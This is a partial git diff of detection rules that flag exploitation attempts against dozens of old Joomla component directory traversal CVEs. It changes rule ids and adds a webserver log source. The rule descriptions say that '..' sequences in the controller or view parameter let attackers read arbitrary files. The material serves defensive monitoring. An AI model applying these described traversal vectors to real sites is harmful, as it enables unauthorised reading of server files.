...web_cve-2010-1601_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1602_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1607_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1657_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1659_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1714_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1717_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1718_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1719_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1722_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1875_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1953_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1954_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1955_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1956_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1979_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1980_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1981_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1983_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2033_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2034_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2035_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2036_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2122_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2259_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2307_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2682_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2861_exploitation_attempt.yml | 4 +++- ...web_cve-2010-2920_exploitation_attempt.yml | 4 +++- ...web_cve-2010-3426_exploitation_attempt.yml | 4 +++- ...web_cve-2010-4231_exploitation_attempt.yml | 4 +++- ...web_cve-2010-4617_exploitation_attempt.yml | 4 +++- ...web_cve-2010-5278_exploitation_attempt.yml | 4 +++- ...web_cve_2010_5278_exploitation_attempt.yml | 24 ------------------- .../sysmon_detect_powerup_dllhijacking.yml | 4 ++-- 63 files changed, 185 insertions(+), 87 deletions(-) delete mode 100644 rules/web/web_cve_2010_5278_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yml b/rules/web/web_cve-2010-0943_exploitation_attempt.yml index e36f9ca0..fb5bfcbf 100644 --- a/rules/web/web_cve-2010-0943_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-0943_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-0943 Exploitation Attempt -id: 3b8a0723-2e41-43ef-b56a-0ebf5859871c +id: f28d6faa-4163-4967-b397-414aab6cbe41 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component com_jashowcase - Directory Traversal:Directory tr in a jashowcase action to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yml b/rules/web/web_cve-2010-0944_exploitation_attempt.yml index caf28629..f33fd3a7 100644 --- a/rules/web/web_cve-2010-0944_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-0944_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-0944 Exploitation Attempt -id: 9a6621c8-26ce-4fa1-a081-5092a31df9f1 +id: 55d082fa-118a-4649-8e06-bf342de0ba84 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component com_jcollection - Directory Traversal:Directory t to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yml b/rules/web/web_cve-2010-0985_exploitation_attempt.yml index 41d2adcf..22a45c28 100644 --- a/rules/web/web_cve-2010-0985_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-0985_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-0985 Exploitation Attempt -id: 65eb9e0e-d8ea-4dbb-bdb1-8a7bfe726218 +id: 624c389f-24aa-44c2-b702-c2b58eb18ff9 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component com_abbrev - Local File Inclusion:Directory trave dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yml b/rules/web/web_cve-2010-1219_exploitation_attempt.yml index 70470533..4a23c671 100644 --- a/rules/web/web_cve-2010-1219_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1219_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1219 Exploitation Attempt -id: 5c13b413-1c5d-471e-b5d0-502d67c2cfff +id: c05d288c-1f70-4090-8f86-9739afedb14b author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component com_janews - Local File Inclusion:Directory trave to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yml b/rules/web/web_cve-2010-1304_exploitation_attempt.yml index e90d45b9..f848a240 100644 --- a/rules/web/web_cve-2010-1304_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1304_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1304 Exploitation Attempt -id: b9f646f1-1e8d-4213-a122-e8cfb2526f7e +id: 6bc9b1ee-a560-4944-84d7-02d45d99cdb1 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component User Status - Local File Inclusion:Directory trav the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yml b/rules/web/web_cve-2010-1305_exploitation_attempt.yml index e1fd2002..77a6a40c 100644 --- a/rules/web/web_cve-2010-1305_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1305_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1305 Exploitation Attempt -id: b80d67c0-e544-463e-8db0-cfa6fd1062c7 +id: 4c450e3e-b786-4bf6-bbf4-f2f44546d61e author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -10,6 +10,8 @@ description: Joomla! Component JInventory 1.23.02 - Local File Inclusion:Directo to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yml b/rules/web/web_cve-2010-1306_exploitation_attempt.yml index b3c45a34..1d0a373d 100644 --- a/rules/web/web_cve-2010-1306_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1306_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1306 Exploitation Attempt -id: 18655982-0c25-41ca-99a9-66c081e5c28e +id: 613ccec4-9812-4cc7-a2f5-bf88383cf83d author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Picasa 2.0 - Local File Inclusion:Directory trave controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yml b/rules/web/web_cve-2010-1307_exploitation_attempt.yml index a0c1b093..cff57926 100644 --- a/rules/web/web_cve-2010-1307_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1307_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1307 Exploitation Attempt -id: 1f6127b7-58d0-428e-afd6-3daa7093f500 +id: d2bcd27a-de8c-465b-889a-62588138feaa author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Magic Updater - Local File Inclusion:Directory tr to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yml b/rules/web/web_cve-2010-1308_exploitation_attempt.yml index 5e7dfeb6..52c29e67 100644 --- a/rules/web/web_cve-2010-1308_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1308_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1308 Exploitation Attempt -id: e7fa765b-d565-42e4-b03e-44a52a25c00a +id: 4cf2d8e5-2b82-484e-b412-bb5fcfb519eb author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component SVMap 1.1.1 - Local File Inclusion:Directory trav to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yml b/rules/web/web_cve-2010-1312_exploitation_attempt.yml index 4d863fd3..65aa281a 100644 --- a/rules/web/web_cve-2010-1312_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1312_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1312 Exploitation Attempt -id: ffb67143-f136-490b-a593-abc36e0a2f44 +id: fc07dc98-780f-4493-98ce-6e1b7c9742e2 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component News Portal 1.5.x - Local File Inclusion:Director the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yml b/rules/web/web_cve-2010-1313_exploitation_attempt.yml index d132790f..cc836644 100644 --- a/rules/web/web_cve-2010-1313_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1313_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1313 Exploitation Attempt -id: 73c88bfc-5e2a-4fac-b2b2-01b29b565d09 +id: 4287d3e9-5ba8-4a00-925b-bce992e8b2d5 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion:Direct to read arbitrary files via a .. (dot dot) in the view parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yml b/rules/web/web_cve-2010-1314_exploitation_attempt.yml index 57b4b947..22c062b9 100644 --- a/rules/web/web_cve-2010-1314_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1314_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1314 Exploitation Attempt -id: bab4e9de-2dab-4471-914b-319ddf29735f +id: 0ce79c5d-cb0c-4800-a040-a0c8c7ad45d1 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Highslide 1.5 - Local File Inclusion:Directory tr parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yml b/rules/web/web_cve-2010-1345_exploitation_attempt.yml index 1a75fecb..e03153f1 100644 --- a/rules/web/web_cve-2010-1345_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1345_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1345 Exploitation Attempt -id: 8e52016c-f42b-4d53-9812-5079fa88bb9a +id: b92bc21b-e649-4695-8f7c-8b881e33ed1c author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Cookex Agency CKForms - Local File Inclusion:Dire the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yml b/rules/web/web_cve-2010-1353_exploitation_attempt.yml index 978f2bd2..17d6462a 100644 --- a/rules/web/web_cve-2010-1353_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1353_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1353 Exploitation Attempt -id: 58e30700-499a-4d21-9c7b-8727e5f8b6e7 +id: 3a9f4835-3518-40e9-91bc-ebb1d918c055 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -8,6 +8,8 @@ description: Joomla! Component LoginBox - Local File Inclusion:Directory travers attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yml b/rules/web/web_cve-2010-1354_exploitation_attempt.yml index 86e14aa8..0c88d17b 100644 --- a/rules/web/web_cve-2010-1354_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1354_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1354 Exploitation Attempt -id: 9d0cfe31-7ead-4c4c-8b33-b77c2a42ca24 +id: 841e7037-c68e-40d1-9fd4-d08fee87f124 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component VJDEO 1.0 - Local File Inclusion:Directory traver to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yml b/rules/web/web_cve-2010-1470_exploitation_attempt.yml index a3480662..00e0319d 100644 --- a/rules/web/web_cve-2010-1470_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1470_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1470 Exploitation Attempt -id: 3dcb67ad-1b33-4721-8386-7cfccd0e3684 +id: 91dcce8a-b0dc-49e8-a766-9bd0d234d397 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Web TV 1.0 - Local File Inclusion:Directory trave a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yml b/rules/web/web_cve-2010-1471_exploitation_attempt.yml index 8043e1a0..af7e60db 100644 --- a/rules/web/web_cve-2010-1471_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1471_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1471 Exploitation Attempt -id: ae585c7e-f75e-4b76-b7cd-a7c3eed7065f +id: c25e9c8b-5bc3-4eda-a29e-62ed09349442 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Address Book 1.5.0 - Local File Inclusion:Directo controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yml b/rules/web/web_cve-2010-1472_exploitation_attempt.yml index b85aaaea..7caddd10 100644 --- a/rules/web/web_cve-2010-1472_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1472_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1472 Exploitation Attempt -id: 7472bddd-70cf-409b-8cdd-30c134bcda60 +id: d189b718-577a-4826-ba75-7965be24403f author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Horoscope 1.5.0 - Local File Inclusion:Directory parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yml b/rules/web/web_cve-2010-1473_exploitation_attempt.yml index 1c46d760..b48610e1 100644 --- a/rules/web/web_cve-2010-1473_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1473_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1473 Exploitation Attempt -id: 2be15734-06fe-4383-8ee4-721d4f8b0a70 +id: 51848efa-1963-4f90-b9ca-e614ab66c848 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Advertising 0.25 - Local File Inclusion:Directory via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yml b/rules/web/web_cve-2010-1474_exploitation_attempt.yml index 83bf15da..25da0891 100644 --- a/rules/web/web_cve-2010-1474_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1474_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1474 Exploitation Attempt -id: b68d5d20-e6ca-425a-9681-93e924c2918b +id: dcb1e22b-b95e-40b0-a95c-620baf73e56d author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion:Directory impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yml b/rules/web/web_cve-2010-1475_exploitation_attempt.yml index 9806d633..94ed4d8f 100644 --- a/rules/web/web_cve-2010-1475_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1475_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1475 Exploitation Attempt -id: 11c50fbe-f54a-4c32-a0ae-9d3ab2b0f547 +id: 58505c84-2d43-4686-9fd3-497a7e4f89a3 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inc unspecified other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yml b/rules/web/web_cve-2010-1476_exploitation_attempt.yml index fc7dcc00..fb13d546 100644 --- a/rules/web/web_cve-2010-1476_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1476_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1476 Exploitation Attempt -id: cc5df87f-99ed-486a-8805-d8b97c5bd5bb +id: a095b6d3-0c40-4719-aa55-01dcb47bc03f author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion:Dire other impact via a .. (dot dot) in the view parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yml b/rules/web/web_cve-2010-1494_exploitation_attempt.yml index e492dff6..2a20d4b9 100644 --- a/rules/web/web_cve-2010-1494_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1494_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1494 Exploitation Attempt -id: 82fc453a-8032-444e-9801-e6ad7b3e3a9c +id: 4c7ff51e-47cb-4f89-8a1c-ec71be8d811a author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component AWDwall 1.5.4 - Local File Inclusion:Directory tr to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yml b/rules/web/web_cve-2010-1495_exploitation_attempt.yml index 8b5b8588..2db4bbab 100644 --- a/rules/web/web_cve-2010-1495_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1495_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1495 Exploitation Attempt -id: eede38ab-67a5-47cd-a0e4-65e82824378d +id: d87e5c39-a7ed-4f34-8be1-ad1697f3d7d7 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Matamko 1.01 - Local File Inclusion:Directory tra to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yml b/rules/web/web_cve-2010-1532_exploitation_attempt.yml index bd2e252a..a0fc22ad 100644 --- a/rules/web/web_cve-2010-1532_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1532_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1532 Exploitation Attempt -id: 7185db2e-b76b-4a9f-b157-51a7f799de43 +id: 2abfc7f1-cf26-44c4-a3ff-5033bfe6b855 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion:Direct unspecified other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yml b/rules/web/web_cve-2010-1533_exploitation_attempt.yml index 1e779cd7..034bfb71 100644 --- a/rules/web/web_cve-2010-1533_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1533_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1533 Exploitation Attempt -id: 4f6c4eef-bd44-4d25-8a4a-7f84a1748ec6 +id: a97dbf8e-5234-4821-9033-d1209c55415c author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component TweetLA 1.0.1 - Local File Inclusion:Directory tr to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yml b/rules/web/web_cve-2010-1534_exploitation_attempt.yml index 1649ce5f..ce58f784 100644 --- a/rules/web/web_cve-2010-1534_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1534_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1534 Exploitation Attempt -id: 25de4419-cce2-4b62-8204-8a4e38114c09 +id: 2a9be005-a6b9-4cdc-aa9e-4d08ba721143 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Shoutbox Pro - Local File Inclusion:Directory tra to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yml b/rules/web/web_cve-2010-1535_exploitation_attempt.yml index ce87bdec..3adce8a2 100644 --- a/rules/web/web_cve-2010-1535_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1535_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1535 Exploitation Attempt -id: df8fe6a5-b4a6-4d8f-bd32-b6456544d0f8 +id: ce1c278f-5c58-4846-93eb-3fd21ed6b41c author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion:Directory via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yml b/rules/web/web_cve-2010-1601_exploitation_attempt.yml index a715d0fa..208fd52b 100644 --- a/rules/web/web_cve-2010-1601_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1601_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1601 Exploitation Attempt -id: cfd25065-8f6b-4181-bda1-e3507b51b114 +id: b2dd80fa-e3bf-4321-bc39-c37295d513dd author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -8,6 +8,8 @@ description: Joomla! Component JA Comment - Local File Inclusion:Directory trave attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yml b/rules/web/web_cve-2010-1602_exploitation_attempt.yml index 41d81aec..a41a645d 100644 --- a/rules/web/web_cve-2010-1602_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1602_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1602 Exploitation Attempt -id: 6a5cc49b-2487-4ec4-8c33-c7d7ba2a3196 +id: f042c30f-ec39-4d1f-bc8b-56c94cd870a7 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion:Directo other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yml b/rules/web/web_cve-2010-1607_exploitation_attempt.yml index f95b2209..6fdab6d4 100644 --- a/rules/web/web_cve-2010-1607_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1607_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1607 Exploitation Attempt -id: 02ad707d-11d8-4654-93b7-668ee425618c +id: 699e3765-a82a-4d7c-8214-8e8fe7c57fdd author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component WMI 1.5.0 - Local File Inclusion:Directory traver local files via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yml b/rules/web/web_cve-2010-1657_exploitation_attempt.yml index ee93c1d6..d861dbc2 100644 --- a/rules/web/web_cve-2010-1657_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1657_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1657 Exploitation Attempt -id: adf6f8fb-fe7f-4dc2-af06-7f8885c5e9e9 +id: e218a3bd-5583-4737-a993-60c14a6839a8 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component SmartSite 1.0.0 - Local File Inclusion:Directory to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yml b/rules/web/web_cve-2010-1659_exploitation_attempt.yml index dd7a2a06..e2208448 100644 --- a/rules/web/web_cve-2010-1659_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1659_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1659 Exploitation Attempt -id: bad7c462-464c-4471-8b46-309f295c5f09 +id: dde389b6-a56a-48a6-98f6-a58ea7adc0b6 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion:Dir in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yml b/rules/web/web_cve-2010-1714_exploitation_attempt.yml index 6c99e6f8..16d1438a 100644 --- a/rules/web/web_cve-2010-1714_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1714_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1714 Exploitation Attempt -id: 3d08c7e5-c55f-48e9-90d9-5abfd04e59f0 +id: 52e333b4-a627-44d5-818d-c222c47568e4 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Arcade Games 1.0 - Local File Inclusion:Directory to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yml b/rules/web/web_cve-2010-1717_exploitation_attempt.yml index 20749f73..b0533786 100644 --- a/rules/web/web_cve-2010-1717_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1717_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1717 Exploitation Attempt -id: d86b7f81-416b-41e1-81d8-d8b0ce291879 +id: 7b5b8495-759b-4ebe-917e-7902579036d9 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component iF surfALERT 1.2 - Local File Inclusion:Directory via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yml b/rules/web/web_cve-2010-1718_exploitation_attempt.yml index c18702c4..67d257ae 100644 --- a/rules/web/web_cve-2010-1718_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1718_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1718 Exploitation Attempt -id: be0a91f3-44af-423b-ac25-21cac3719194 +id: b263bad9-acf2-45d6-a1e7-bfde91cdcf08 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 